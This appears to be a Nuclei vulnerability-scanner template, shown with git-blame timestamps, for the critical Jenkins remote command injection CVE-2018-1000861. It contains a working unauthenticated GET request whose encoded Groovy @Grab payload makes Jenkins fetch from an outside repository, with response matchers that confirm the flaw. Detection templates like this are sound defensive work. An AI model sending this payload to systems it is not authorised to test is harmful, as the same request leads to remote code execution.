2021-02-20 11:11:15 +00:00
id : CVE-2018-1000861
info :
2022-05-13 20:26:43 +00:00
name : Jenkins - Remote Command Injection
2021-06-09 12:20:56 +00:00
author : dhiyaneshDK,pikpikcu
2021-02-20 11:11:15 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000861
2022-05-17 09:18:12 +00:00
- https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176
2021-09-10 11:26:40 +00:00
classification :
2022-06-14 10:58:58 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-1000861
cwe-id : CWE-502
2023-04-12 10:55:48 +00:00
epss-score : 0.97348
2022-11-13 20:54:52 +00:00
tags : kev,vulhub,cve,cve2018,rce,jenkins
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-02-20 11:11:15 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-20 11:11:15 +00:00
- method : GET
path :
- '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'
matchers-condition : and
matchers :
- type : word
words :
- "package#vulntest"
part : body
- type : status
status :
- 200
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/12